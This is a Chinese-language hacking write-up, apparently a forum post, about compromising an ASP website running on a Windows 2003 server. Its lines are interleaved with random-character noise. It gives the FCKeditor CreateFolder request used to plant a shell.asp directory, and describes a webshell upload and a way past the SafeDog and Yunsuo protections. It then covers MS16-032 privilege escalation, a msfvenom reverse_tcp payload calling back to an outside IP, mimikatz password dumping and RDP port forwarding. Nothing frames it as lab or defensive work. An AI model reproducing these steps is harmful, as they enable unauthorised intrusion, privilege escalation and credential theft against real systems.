|
5 L# p$ m" v( F. j# j4 I 4 b6 ^2 x" D5 t0 R: Y
5 {. r7 s- s ^5 d
' f, I, q" ]# ~ |
$ L4 \4 C0 X0 `* L% y2 ~* s & I. a! N! D& v$ I0 \1 x& _) g
. i- a$ x3 p( x& n a$ `. `
一、 利用getwebshell篇
- f% d2 I- n& x/ i0 `6 B
$ [ L- ?2 J; D9 L8 n8 ]# H9 H' ^0 @首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
! d! Y( O! Y8 U1 N! m; T, x. `) P
1 }1 [ {2 d0 W
6 @6 m" w7 p( Z& y/ o2 ]- K* p2 Q下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 2 w; M! @: E' R; p4 I
 : P7 C2 d2 L7 V/ p" Q5 ?
下面我们构造一个asp目录,如: g9 N9 ~+ i' W3 L0 ?1 ^9 X9 _
8 t1 G1 w# m9 S- q4 x% V3 j1 H
4 U- ?2 X4 M" _6 n- \ http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ) v+ ]( M- N8 K5 v# e" X/ S, Q! m
4 T' I8 u- W; n$ w5 f& E
, y! U( u( l/ P* t; P
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 4 z( C. h5 z6 k
2 o1 A- `# K( e1 a! C2 |7 p
一、 绕过安全狗云锁提权并且加账号
8 P$ t; D; x. A
3 Y. d" C6 \' p( V2 _没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
0 a+ N0 v# `) t* ?, w7 P7 O$ i: z 1 i5 I d; w) z$ C }6 c- c
如图:
3 I# Y9 \% ~6 L5 A3 q
2 N# r) L) l, l# E7 }/ z# Q; H然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
3 F0 c0 k0 A4 F8 i% Y) T7 x9 Z+ H: g9 C 0 e k5 I) {4 G+ ^1 ?# o d
一、 利用metasploit % D: H2 ^ x. T1 u% B
( \6 M1 L, e9 H! p' _+ ]
首先用pentestbox生成一个64位的payload如下命令
! P( M( C$ {- ^9 n2 L0 a% e ; g Y4 C7 o/ C A! {) ?, \
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
2 p, r6 _" Y7 M+ y' n: M
' r( @/ o, f) J9 r1 E {6 ]为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
* K; T# H& G \( `- m. `! q
* G6 u; k! E; W7 `4 `下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: 2 _5 L; r( @ C K1 q8 ]
 % Y! t( Z9 u4 M2 z7 g8 q2 ]
下面我们来做一个监听如下命令: 5 h) B Q9 S' b4 T3 ]2 Z
$ D: f* a; ~% A( m0 m
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: % d$ e( X4 P+ |+ H# V* A
; k" J# j8 F+ F3 s! E9 q3 [/ i- i
# R3 O8 X5 }. a- E; } |
0 E6 ^; V/ u' x
7 ^ I: V$ @' g( A
3 D; t3 |0 m8 W- _7 P5 ^
+ j$ Y/ G' l% L7 s+ [
/ _+ c2 q" Y, X. }2 F: n3 Y* R3 O) e
1 z- a1 r$ {# p: y; R' ?% ~, M6 S
9 {# o" [) ^4 }9 I1 N' n: ] 6 X; l9 Z% Y# G2 Z# Y8 ^
% s# N h. K. z: r. f4 i
# @8 K, P, y/ ]
7 A5 e) ~7 U3 _9 j( {# S" o/ l# e
, D0 T$ V1 d! l' X $ D+ X+ W$ E( k: H& x2 Z
|